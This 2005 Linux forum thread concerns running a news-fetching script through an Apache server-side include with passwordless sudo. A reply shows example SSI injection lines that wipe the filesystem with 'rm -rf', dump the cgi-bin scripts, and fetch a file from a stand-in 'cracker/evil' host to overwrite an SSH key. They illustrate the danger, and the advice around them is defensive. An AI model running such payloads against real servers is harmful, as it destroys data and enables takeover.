LinuxQuestions.org
LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
Old 03-01-2005, 06:15 AM   #1
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Rep: Reputation: 30
When using SSI, can I limit how often a command can be run?


For instance, I've got a little script that goes out and gets all my rss feeds, then parses them to display on my webpage. Rather than have cron go out and update these feeds every 10 minutes (I want to make sure they're always fresh, but this seems a bit much), I'm just using server side includes and have a link on my page that executes the script (via sudo, which I have configured to allow apache to run this command without password) so that I only have to update them when I'm actually reading them. This seems to be working really well, but it leaves the obvious ability for somebody viewing the webpage to click the link a million times and bog down (or crash) my PC.

To make sure I'm clear, here's the code on the webpage to issue the command...

Code:
<pre>
<!--#exec cmd="sudo getnews" -->
</pre>
So, get to the point, right? Is there a setting somewhere with which I can control how often this can be done? The getnews "script" is located in /bin and it's basically just a shell "script" (I use quotes because I'm no script writer... it's just a file that starts with #!/bin/bash and then issues a bunch of calls to a Perl script, so I call that a script). Can I either set a minimum time between allowed runs of this file in /bin, or is there some way to set a minimum wait between times Apache is allowed to use sudo to issue it (remember, no password is set, so I can't just use password expiry)? That would essentially create the same effect.
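Something like a timestamp guard at the top of the script is roughly what I'm imagining; here's a sketch (the stamp file path, the 600-second interval, and the function name are all made up, not from my actual setup):

```shell
#!/bin/bash
# Sketch: refuse to do the real work if the script ran less than
# MIN_INTERVAL seconds ago, using a timestamp file as the record.
# STAMP path and interval are illustrative defaults.
STAMP=${STAMP:-/tmp/getnews.stamp}
MIN_INTERVAL=${MIN_INTERVAL:-600}

allowed_to_run() {
    local now last
    now=$(date +%s)
    if [ -f "$STAMP" ]; then
        last=$(cat "$STAMP")
        if [ $(( now - last )) -lt "$MIN_INTERVAL" ]; then
            return 1    # ran too recently; caller should skip the work
        fi
    fi
    echo "$now" > "$STAMP"    # record this run's time
    return 0
}

# In the real script, the feed fetching would be wrapped like:
#   allowed_to_run || exit 0
#   ...calls to the perl script go here...
```

That way a visitor hammering the link only ever costs one real run per interval; the extra clicks just hit the early return.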

Ugh, It's early so I hope I'm being clear....

Any ideas, thoughts, suggestions?

Thanks,

Jeff
 
Old 03-01-2005, 06:35 AM   #3
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
You can look at the man pages for wait or sleep and use one of those. Here is the first line of the sleep man page:

The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
below).

But if you decide to stay with the current setup of your program, you are creating a really big security risk. Allowing the server-side include #exec command lets users execute system commands directly on the server. So I could do this on your machine as root right now:

<!--#exec cmd="sudo rm -rf /*" -->

This would probably be the least of your problems. A rootkit will be installed faster than you can say Debian. If you do not take security precautions, people will abuse your box and the whole internet will laugh and point at you.

gnube
 
Old 03-01-2005, 06:39 AM   #4
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Original Poster
Rep: Reputation: 30
Thanks for the reply. I'll check the man pages for those...

As for the security risk, I had read about that. Let me just confirm that what I've done is sufficient...

I DO have a guestbook on the site (which is what helps create the risk, due to the write access it gives visitors, right?), but it has its own subdirectory. I have set that directory in the httpd.conf file to NOT allow execs. This works, right? I've also tried to confirm by adding a new guestbook entry containing this...

Code:
<pre>
<!--#exec cmd="whoami" -->
</pre>
<pre>
<!--#exec cmd="ls" -->
</pre>
Neither of these returned anything in the guestbook entry, so I figured it had worked. Sound right to you?
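The httpd.conf bit I used is essentially this; a sketch, with the directory path just being wherever your guestbook actually lives:

```
<Directory "/var/www/html/guestbook">
    Options +IncludesNOEXEC
</Directory>
```

IncludesNOEXEC still allows ordinary #include directives in that directory but disables #exec, which is why the test entries above come back empty.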

Are there other risks I need to know about? I've tried to do my research, but let me know if I'm missing anything.

Thanks again!
 
Old 03-01-2005, 07:25 AM   #5
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
The issue is not only creating a directory where the shtml file cannot execute commands; it is also who it runs as. Apache is usually set to run as a non-root user. If you have changed /etc/sudoers to allow it to execute commands as root, then it can do whatever it wants in the wrong hands. Someone could rewrite the URL to include malicious code that Apache can execute as root! This is serious.

Did you try <!--#exec cmd="sudo ls"--> ?
Or <!--#exec cmd="for i in `ls /var/www/cgi-bin/`; do cat $i; done"-->
Or <!--#exec cmd="touch .ssh/identity.pub"-->
<!--#exec cmd="wget -q -O .ssh/identity.pub http://cracker/evil"-->


I recommend not allowing Apache to be run as root and taking the apache user out of the sudoers file. If apache needs to get info from a remote site, why don't you script it with curl or wget? Then you can download it anywhere you want and the .shtml file can process it. Then you decrease your exposure and risk considerably.

Consider something like this...

Small shell script:
Code:
<pre>
curl -o newsfile http://www.newssite.com/newsfile
</pre>
shtml file:
Code:
<pre>
<!--#include virtual="newsfile"-->
</pre>

Last edited by gnube; 03-01-2005 at 07:35 AM.
 
Old 03-01-2005, 07:37 AM   #6
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Original Poster
Rep: Reputation: 30
I'm actually using wget already to get a couple of the feeds (for some reason my JSMFeed.pl script doesn't like a couple of them), but it too would start to bog my system down if the page were refreshed repeatedly... right? That's assuming you were suggesting adding the curl code right into the webpage...

I had set the sudoers file so that apache could run ONLY the /bin/getnews script, figured that would take care of the sudo security risk.
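For the record, the sudoers entry I mean is roughly this; a sketch, assuming the web server runs as the apache user:

```
apache ALL = (root) NOPASSWD: /bin/getnews
```

So apache can run that one script as root without a password, and nothing else via sudo.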

After all this talk I've gotten all security-nervous again, so I dumped the whole exec cmd thing and went back to having cron update the feeds every 10 minutes.

Then I just put a refresh link on the page, for those internet newbies who can't find the button....;-)

Oh well, twas a fun learning experience...

Thanks for the replies...
 
Old 03-01-2005, 08:40 AM   #7
gnube
LQ Newbie
 
Registered: Dec 2003
Location: Gothenburg, Sweden
Distribution: Fedora | RedHat
Posts: 13

Rep: Reputation: 0
Can't you update the feeds in the background with cron and wget, then refresh the web page? I think that would be the most efficient use of resources.
 
Old 03-01-2005, 09:05 AM   #8
jeffreybluml
Member
 
Registered: Mar 2004
Location: Minnesota
Distribution: Fedora Core 1, Mandrake 10
Posts: 405

Original Poster
Rep: Reputation: 30
You're probably right. That was how I originally set it up, but then I decided that it was a waste to have the feeds updating when I'm not at the computer looking at them, so I put this in.

I'm starting to think I just did this for something to do, as the more I think about it the sillier this whole venture seems. But again, it was a fun little experiment and I learned something. I have resorted to my original setup, which really was the most logical: I have cron updating the feeds every 10 minutes (as well as a couple of weather radar images, more use for wget) and the frame on the webpage auto-updates every 5.

Question regarding wget: is there a way to COMPLETELY suppress ANY output from the command? I read through man and info, and I can get it to run "in the background" and all that, but it still produces an output message like "continuing in background...PID.....output will be written to wget-whatever.log" or whatever (which then gets mailed to me in /var/spool/mail), and then, of course, saves a log file. So I've got cron deleting these log files periodically as well as my /var/spool/mail (seriously, cron is the coolest tool ever!), but is there any way to just stop them from being created?
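For what it's worth, a sketch of the two pieces that silence this (the flags are real wget flags; the paths, URL, and crontab line are illustrative):

```shell
# -q makes wget completely quiet: no progress output, and since the job
#    is not backgrounded with -b, no wget-log file is created either.
# -O writes the download to a named file instead of a derived name.
#
#   wget -q -O /var/www/html/newsfile http://www.newssite.com/newsfile
#
# In the crontab entry itself, redirecting stdout and stderr to /dev/null
# keeps cron from mailing whatever output remains:
#
#   */10 * * * * /bin/getnews > /dev/null 2>&1
#
# The redirection trick works for any noisy command, e.g.:
noisy() { echo "progress..."; echo "warning!" 1>&2; }
noisy > /dev/null 2>&1   # both streams discarded; nothing printed, nothing mailed
```

With -q on the wget calls and the 2>&1 redirection on the cron line, no log files or cron mail should be generated in the first place, so there is nothing to clean up.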

Anyways, regardless of whether or not you can answer that, thanks for the insight here. I'm glad I was able to be persuaded back to keeping it simple....

Thanks,

Last edited by jeffreybluml; 03-01-2005 at 09:07 AM.
 
  

